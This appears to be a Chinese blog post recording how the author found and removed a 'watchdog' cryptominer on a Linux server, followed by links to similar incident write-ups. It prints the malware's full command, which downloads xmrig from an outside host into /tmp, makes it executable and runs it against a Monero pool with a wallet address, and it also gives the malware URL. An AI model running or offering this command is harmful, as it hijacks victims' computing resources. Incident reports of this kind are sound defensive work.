记录一次watchdog被挖矿

原创 已于 2023-04-04 10:34:22 修改 · 829 阅读 · 2 ·
本内容遵循CC 4.0 BY-SA版权协议
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
标签
#linux
于 2021-06-29 23:08:34 首次发布
本文记录了一次系统受到恶意挖矿软件入侵的经历。通过发现CPU使用率异常升高,定位并终止了可疑进程,并采取措施防止再次被入侵。

突然发现机器cpu很高,一看cpu飙到60%

查了一下进程发现可疑的进程,给干掉了,cpu恢复正常

bash -c curl https://whatsmyipv4.cf/xmrig -o /tmp/watchdog && chmod +x /tmp/watchdog && nohup /tmp/watchdog --donate-level 1 -o sg.minexmr.com:443 -u 44BwEPy6EAHMgi7x2SXq1v3kdokMgKFvxfKSr5jWEY6y7hVn7pLCe61AEvgogFDUoCKHE6P5BMHZj2UpMpyhwobY2ZR89vT -k --tls &

root     21871 21636 99 Jun26 ?        6-01:32:36 /tmp/watchdog --donate-level 1 -o sg.minexmr.com:443 -u 44BwEPy6EAHMgi7x2SXq1v3kdokMgKFvxfKSr5jWEY6y7hVn7pLCe61AEvgogFDUoCKHE6P5BMHZj2UpMpyhwobY2ZR89vT -k --tls

同时去目录删掉

/tmp/watchdog

查看定时任务没有可疑的。

再检查进程发没发现可疑进程。

关闭用不到的端口

==============================================================

我还试着访问了一下这个地址?电脑管家提示文件有病毒。

https://whatsmyipv4.cf/xmrig

HandleSolver
关注
服务器又被挖矿记录
夏日 の blog
03-08 4283
23年11月的时候我写过一篇记录服务器被挖矿的情况,。当时是在桌面看到了bash进程CPU占用异常发现了服务器被挖矿。而过了几个月没想到又被攻击,这次比上次攻击手段要更高明点,在这记录下吧。
named服务异常日志带出来的挖矿病毒
u010101453的博客
05-24 1022
关键字: client donate.v2.xmrig.com query cache denied。ssh到203节点后,cat /etc/resolv.conf,通过其配置也能证明这一点。知道PID后,就可以定位病毒位置了。一般这种病毒,都会有定时任务,可以再查一下定时任务。根据日志可知,是客户端20.20.20.203,一直在向该节点解析域名。这样通过ps看到的进程名就是bash。
云主机发现主机CPU使用率很高:./trace -r 2 -R 2 --keepalive --max-cpu-usage 80 --cpu-priority 3
徊忆羽菲
12-15 1381
云主机发现主机CPU使用率很高:./trace -r 2 -R 2 --keepalive --no-color --donate-level 1 --max-cpu-usage 80 --cpu-priority 3 今天登陆了共有云主机发现主机CPU使用率很高,top命令查看,发现有两个trace进程占用CPU超级高。 通过ps -ef|grep trace查看到两条trace进程,这里截取...
如何快速部署dhtcrawler2:从零开始的完整教程指南
gitblog_00016的博客
05-14 394
dhtcrawler2是一款用Erlang编写的DHT网络爬虫,能够加入DHT网络并抓取大量P2P种子文件,将所有种子信息保存到数据库中,并提供HTTP接口通过关键词搜索种子。本教程将带你从零开始,快速完成dhtcrawler2的部署与使用。 ## 准备工作:环境与依赖安装 ### 安装Erlang运行环境 dhtcrawler2需要Erlang R16B或更高版本支持。请根据你的操作系统下载
网络安全应急响应----6、挖矿攻击应急响应
热门推荐
七天
03-21 2万+
文章目录一、挖矿木马简介1挖矿流程2、挖矿木马的传播方式二、常见的挖矿木马三、挖矿木马应急响应方法3.1、隔离被感染的服务器/主机3.2、确认挖矿进程3.3、系统排查3.3.1、判断挖矿木马挖矿时间3.3.2、了解网络部署环境3.3.3、系统排查3.4、挖矿木马清除四、挖矿木马防御 一、挖矿木马简介 挖矿: 每隔一个时间点,比特币系统会在系统节点上生成一个随机代码,互联网中的所有计算机都可以去寻找此代码,谁找到此代码,就会产生一个区块。而比特币的发行是基于奖励的,每促成一个区块的生成,该节点便获得相应
服务器遭遇挖矿脚本入侵,歪果仁玩的真花
王声声的博客
03-21 2734
【代码】服务器遭遇挖矿脚本入侵,歪果仁玩的真花。
如何更有效的消灭watchdogs挖矿病毒?华为云DCS Redis为您支招
weixin_34319999的博客
02-27 354
2019独角兽企业重金招聘Python工程师标准>>> ...
服务器中了名为spreabcd的挖矿病毒,处理流程。
qq_35031494的博客
06-04 644
今天早上在服务器输入命令的时候,突然发现很卡。 于是看了一下内存,发现竟然被全部占用,然后又看了一下cpu,竟然飙到了200%!!!what fack? ps看了一下有几个相关进程: 于是就按网上的方法进行排查: 1.查看进程相关信息:systemctl status 24705 可以看到与这几个文件相关。 ...
云服务器中挖矿病毒watchdog记录
c_o_d_e_的博客
03-16 2842
晚上收到阿里云服务器被攻击的紧急邮件,登录控制台就发现遭到了恶意植入挖矿病毒,直接把我cpu资源吃完了,可恨。 主要是挖矿程序和恶意脚本代码执行,我把这六个问题分别截图,挨个来解决 一、挖矿程序 看这两个挖矿程序的PID相同,直接追踪目标吧。应该是通过恶意植入了一个文件。先通过top查看了资源情况,好家伙,直接抓到凶犯。 本想着直接kill -9杀掉该进程再说,但看了阿里云社区的相关案例,发现这种挖矿程序似乎还会出现,于是通过ls -l /proc/30282/exe找到了这个文..
解决Watchdogs 、kthrotlds 挖矿蠕虫
u010576019的博客
09-25 1159
在最近开发项目部署过程中,发现项目运行缓慢,人员数过多情况下系统卡死。 查看服务器,top命令发现服务器中毒 crontab -l 命令后发现也存在定时调度,打开定时调度文件/root/.systemd-init 发现文件为base64编码,我靠。文件如下: #!/bin/bash exec &>/dev/null sleep 119 echo ZXhlYyAmPi9kZXYvbnV...
今天,你的服务器被“挖矿”了吗?
weixin_34010566的博客
06-10 681
本文作者:晨光 运维工程师 web服务应用是最为常见的应用之一,主要是通过对公网放行服务器的端口供客户访问来提供服务。这类服务对数据安全、访问控制的要求会比较高。但最为核心的还是后端服务器主机层,当后端主机不能正常工作时,前端展示的web服务一定是收到牵连的,如何维护后端服务器正常运行就显得尤为重要了。 这里提到后端主机的正常运行,就不得不提“***”这个词了,让互联网小白一筹莫展的无形杀手。他...
Linux服务器挖矿木马攻防实战:从入侵排查到防御加固
weixin_34248023的博客
06-21 364
在云计算与服务器运维领域,服务器安全是保障业务连续性的基石。其核心原理在于通过系统加固、访问控制和持续监控,构建纵深防御体系,抵御外部威胁。这一实践的技术价值在于直接保护企业核心计算资源与数据资产,避免因安全事件导致的服务中断与经济损失。典型的应用场景包括公有云服务器、企业自建数据中心以及各类在线业务平台的安全防护。本文将聚焦于其中一种高发威胁——挖矿木马,深入解析其利用漏洞入侵、消耗CPU资源进行加密货币挖矿的攻击链路,并提供从进程排查、文件清理到系统加固的完整解决方案,帮助运维人员有效应对资源劫持风险,
深度解析Aminer挖矿木马:攻击链、隐藏技术与实战清除指南
weixin_33896726的博客
06-24 107
Linux服务器安全领域,恶意软件防护是保障系统稳定运行的核心议题。其原理在于攻击者通过利用系统漏洞或弱配置,植入恶意程序以窃取计算资源。这类威胁的技术价值在于其高度的隐蔽性和持久化能力,能绕过常规监控,长期潜伏。典型的应用场景包括云主机、企业服务器等承载关键业务的环境,一旦失陷将导致性能下降与安全风险。本文聚焦于近期活跃的“Aminer”挖矿木马家族,它通过系统服务、定时任务和动态链接库劫持等【持久化机制】实现深度隐藏,并常利用【Redis未授权访问】等常见漏洞进行初始传播。文章将详细拆解其完整的攻击链
Linux服务器安全运维实战:漏洞扫描与病毒查杀全流程指南
weixin_34295316的博客
06-21 269
在信息安全领域,漏洞扫描与恶意软件防护是保障系统安全的核心技术。其原理是通过自动化工具对系统进行深度检测,识别已知的安全弱点(CVE)和潜伏的恶意代码。这项技术的价值在于变被动防御为主动发现,能有效降低数据泄露、服务中断等安全风险,是满足等保合规、保障业务连续性的关键环节。应用场景广泛,从企业级服务器集群到个人云主机均需部署。本文聚焦Linux环境,深入解析如何利用OpenVAS、ClamAV等工具构建涵盖扫描、评估、修复、验证的闭环安全运维体系,并特别针对挖矿木马等顽固威胁提供应急响应与自动化集成方案。
Volatility 3高级实战:Linux内存取证核心技术与应用
最新发布
weixin_29324401的博客
06-24 173
内存取证是数字取证与应急响应领域的关键技术,它通过分析系统物理内存(RAM)的瞬时快照,获取攻击发生时最原始、动态的证据。其核心原理在于,系统运行时的进程、网络连接、加密密钥等数据都驻留在内存中,即使硬盘数据被篡改或删除,内存中的“热数据”仍能揭示攻击链。这项技术的价值在于能够有效应对无文件攻击、进程注入等高级威胁,在恶意软件分析、入侵调查和事件响应等场景中不可或缺。本文聚焦于下一代开源框架Volatility 3在Linux环境下的高级实战应用,深入解析其针对现代Linux内核的插件集与架构优势,并详细演
【信息科学与工程学】计算机科学与自动化——第一百八十九篇 计算机硬件 系列一 微处理器01
weixin_49199313的博客
07-02 891
在金融行业CDN流推送场景中,结合WebRTC over SD-RTN与SD-WAN Branch方案,需兼顾​​要求。
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值